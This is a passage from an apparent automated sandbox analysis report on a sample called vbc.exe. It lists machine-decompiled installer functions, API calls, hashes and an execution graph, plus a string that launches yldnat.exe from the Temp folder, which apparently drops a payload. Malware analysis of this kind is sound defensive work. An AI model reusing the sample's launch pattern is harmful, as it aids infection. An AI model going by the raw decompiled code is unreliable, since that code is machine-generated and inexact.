                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 2584051700-0
                                                        • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                        • Instruction ID: c4fbce1732c038d4ae3387388930f25584bd8a0c3a5059ecf0713bcf7412b626
                                                        • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                        • Instruction Fuzzy Hash: 0E01B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 59%
                                                        			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065B5();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                        0x00401c43
                                                        0x00401c45
                                                        0x00401c4c
                                                        0x00401c4f
                                                        0x00401c52
                                                        0x00401c5c
                                                        0x00401c60
                                                        0x00401c63
                                                        0x00401c6c
                                                        0x00401c6c
                                                        0x00401c6f
                                                        0x00401c73
                                                        0x00401c7c
                                                        0x00401c7c
                                                        0x00401c7f
                                                        0x00401c83
                                                        0x00401c85
                                                        0x00401cda
                                                        0x00401cdc
                                                        0x00401ce7
                                                        0x00401cf1
                                                        0x00401cf4
                                                        0x00401cf4
                                                        0x00401cfd
                                                        0x00000000
                                                        0x00401c87
                                                        0x00401c8e
                                                        0x00401c90
                                                        0x00401c93
                                                        0x00401c99
                                                        0x00401ca0
                                                        0x00401ca3
                                                        0x00401ccb
                                                        0x00401d03
                                                        0x00401d03
                                                        0x00401ca5
                                                        0x00401cb3
                                                        0x00401cbb
                                                        0x00401cbe
                                                        0x00401cbe
                                                        0x00401ca3
                                                        0x00401d06
                                                        0x00401d09
                                                        0x00401d0f
                                                        0x00402ba4
                                                        0x00402ba4
                                                        0x00402c2d
                                                        0x00402c39

                                                        APIs
                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                                                        • Instruction ID: a8e9040b9442a73e8ccf438a9e221504da771f110143023329da3593775932a3
                                                        • Opcode Fuzzy Hash: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                                                        • Instruction Fuzzy Hash: 2D219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404E77 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E00404E77(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066AB(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066AB(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066AB(_t44, _t50, 0x7a1f88, 0x7a1f88, _a8);
				wsprintfW(_t34 + lstrlenW(0x7a1f88) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x7a7a78, _a4, 0x7a1f88);
			}



















                                                        0x00404e80
                                                        0x00404e85
                                                        0x00404e8d
                                                        0x00404e8e
                                                        0x00404e9b
                                                        0x00404ea3
                                                        0x00404ea4
                                                        0x00404ea6
                                                        0x00404ea8
                                                        0x00404eaa
                                                        0x00404ead
                                                        0x00404ead
                                                        0x00404eb4
                                                        0x00404eba
                                                        0x00404eba
                                                        0x00404ec1
                                                        0x00404ec8
                                                        0x00404ecb
                                                        0x00404ece
                                                        0x00404ece
                                                        0x00404ed2
                                                        0x00404ee2
                                                        0x00404ee4
                                                        0x00404ee7
                                                        0x00404e90
                                                        0x00404e90
                                                        0x00404e97
                                                        0x00404e97
                                                        0x00404eef
                                                        0x00404efa
                                                        0x00404f10
                                                        0x00404f21
                                                        0x00404f3d

                                                        APIs
                                                        • lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                                                        • wsprintfW.USER32 ref: 00404F21
                                                        • SetDlgItemTextW.USER32 ref: 00404F34
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s
                                                        • API String ID: 3540041739-3551169577
                                                        • Opcode ID: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                                                        • Instruction ID: f4f79be78f3b00f65903d53a5db5cb29a0acdec533a94133042e7cdde7caf59d
                                                        • Opcode Fuzzy Hash: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                                                        • Instruction Fuzzy Hash: 5711D5736041282BDB00A56DDD45E9F3288AB81334F250637FA25F21D1EA79882186E8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405F3D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00405F3D(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                        0x00405f3e
                                                        0x00405f4b
                                                        0x00405f4c
                                                        0x00405f57
                                                        0x00405f5f
                                                        0x00405f5f
                                                        0x00405f67

                                                        APIs
                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F43
                                                        • CharPrevW.USER32(?,00000000), ref: 00405F4D
                                                        • lstrcatW.KERNEL32 ref: 00405F5F
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3D
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-4017390910
                                                        • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                        • Instruction ID: 4d139d42d978cba7810d0072a9498665e67a0d594e33c17037060be18c5eefd9
                                                        • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                        • Instruction Fuzzy Hash: F6D0A771101A306EC1117B648C04CDF729CEE89344346443BF901B70A0CB7D1D5287FD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405644 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 89%
                                                        			E00405644(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x7a1f74 != _t16) {
							_push(_t16);
							_push(6);
							 *0x7a1f74 = _t16;
							E00405005();
						}
						L11:
						return CallWindowProcW( *0x7a1f7c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F85(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404616(0x413);
				return 0;
			}





                                                        0x00405648
                                                        0x00405652
                                                        0x0040566e
                                                        0x00405690
                                                        0x00405693
                                                        0x00405699
                                                        0x004056a3
                                                        0x004056a4
                                                        0x004056a6
                                                        0x004056ac
                                                        0x004056ac
                                                        0x004056b6
                                                        0x00000000
                                                        0x004056c4
                                                        0x0040567b
                                                        0x004056b3
                                                        0x004056b3
                                                        0x00000000
                                                        0x004056b3
                                                        0x00405687
                                                        0x00405689
                                                        0x00000000
                                                        0x00405689
                                                        0x00405658
                                                        0x00000000
                                                        0x00000000
                                                        0x0040565f
                                                        0x00000000

                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00405673
                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004056C4
                                                          • Part of subcall function 00404616: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404628
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                                                        • Instruction ID: d595ca740675a0faf81d7ea6a2f5abbfab032377942bf72e797c79c3d66f513a
                                                        • Opcode Fuzzy Hash: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                                                        • Instruction Fuzzy Hash: B1017131201609AFEF209F21DD80A9B3A26EB85754F904837FA08762D1C77B8D919F6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040653C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 90%
                                                        			E0040653C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004064DB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                        0x0040654a
                                                        0x0040654c
                                                        0x00406564
                                                        0x00406569
                                                        0x0040656e
                                                        0x004065ac
                                                        0x004065ac
                                                        0x00406570
                                                        0x00406582
                                                        0x0040658d
                                                        0x00406593
                                                        0x0040659e
                                                        0x00000000
                                                        0x00000000
                                                        0x0040659e
                                                        0x004065b2

                                                        APIs
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 00406582
                                                        • RegCloseKey.ADVAPI32(?), ref: 0040658D
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna, xrefs: 00406543
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
                                                        • API String ID: 3356406503-540822073
                                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                        • Instruction ID: 9e12fcea604be09863af9e628fe48d824a74a48827fd48a6b9c69832a92d0d42
                                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                        • Instruction Fuzzy Hash: DA015A72500209FADF218F51DC09EDB3BA8EB54364F01803AFD1AA2190E739D964DBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004060C3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004060C3(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                        0x004060d3
                                                        0x004060d5
                                                        0x004060d8
                                                        0x00406104
                                                        0x004060dd
                                                        0x004060e6
                                                        0x004060eb
                                                        0x004060f6
                                                        0x004060f9
                                                        0x00406115
                                                        0x004060fb
                                                        0x00406102
                                                        0x00000000
                                                        0x00406102
                                                        0x0040610e
                                                        0x00406112
                                                        0x00406112
                                                        0x0040610c
                                                        0x00000000

                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                                                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060EB
                                                        • CharNextA.USER32(00000000), ref: 004060FC
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                        • Instruction ID: ebd02a31c913037c7252cee765efb5e80e8868db32339617edb9e16a90b2d78f
                                                        • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                        • Instruction Fuzzy Hash: 7CF0F631100054FFDB02DFA5CD40D9EBBA8DF46350B2640BAE841FB311D674DE11ABA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:11.6%
                                                        Dynamic/Decrypted Code Coverage:5.2%
                                                        Signature Coverage:7.4%
                                                        Total number of Nodes:1735
                                                        Total number of Limit Nodes:105
                                                        execution_graph 8372 13b33fc 8373 13b3431 8372->8373 8374 13b340c 8372->8374 8374->8373 8379 13b4961 8374->8379 8380 13b496d __initptd 8379->8380 8381 13b36db __write_nolock 58 API calls 8380->8381 8382 13b4972 8381->8382 8383 13b7580 _abort 62 API calls 8382->8383 8384 13b4994 8383->8384 8385 13b46f1 8386 13b4869 __calloc_crt 58 API calls 8385->8386 8387 13b46fb EncodePointer 8386->8387 8388 13b4714 8387->8388 8389 13b6470 RtlUnwind 7814 13b1737 7817 13b3ec8 7814->7817 7816 13b173c 7816->7816 7818 13b3eeb 7817->7818 7819 13b3ef8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7817->7819 7818->7819 7820 13b3eef 7818->7820 7819->7820 7820->7816 7821 13b1f37 7828 13b58ce 7821->7828 7823 13b1f4a 7826 13b4831 _free 58 API calls 7823->7826 7827 13b1f55 7826->7827 7841 13b58d7 7828->7841 7830 13b1f3c 7830->7823 7831 13b5787 7830->7831 7832 13b5793 __initptd 7831->7832 7833 13b442f __lock 58 API calls 7832->7833 7836 13b579f 7833->7836 7834 13b5804 7871 13b581b 7834->7871 7836->7834 7838 13b57d8 DeleteCriticalSection 7836->7838 7858 13b7c39 7836->7858 7837 13b5810 __initptd 7837->7823 7840 13b4831 _free 58 API calls 7838->7840 7840->7836 7842 13b58e3 __initptd 7841->7842 7843 13b442f __lock 58 API calls 7842->7843 7850 13b58f2 7843->7850 7844 13b5990 7854 13b59b2 7844->7854 7846 13b1f9d __getstream 59 API calls 7846->7850 7847 13b599c __initptd 7847->7830 7849 13b5824 82 API calls __fflush_nolock 7849->7850 7850->7844 7850->7846 7850->7849 7851 13b597f 7850->7851 7852 13b2007 __getstream 2 API calls 7851->7852 7853 13b598d 7852->7853 7853->7850 7857 13b4599 LeaveCriticalSection 7854->7857 7856 13b59b9 7856->7847 7857->7856 7859 13b7c45 __initptd 7858->7859 7860 13b7c59 7859->7860 7861 13b7c71 7859->7861 7862 13b1cc3 __cftog_l 58 API calls 7860->7862 7863 13b1f5e __lock_file 59 API calls 7861->7863 7870 13b7c69 __initptd 7861->7870 7864 13b7c5e 7862->7864 7865 13b7c83 7863->7865 7866 13b1e89 __cftog_l 9 API calls 7864->7866 7874 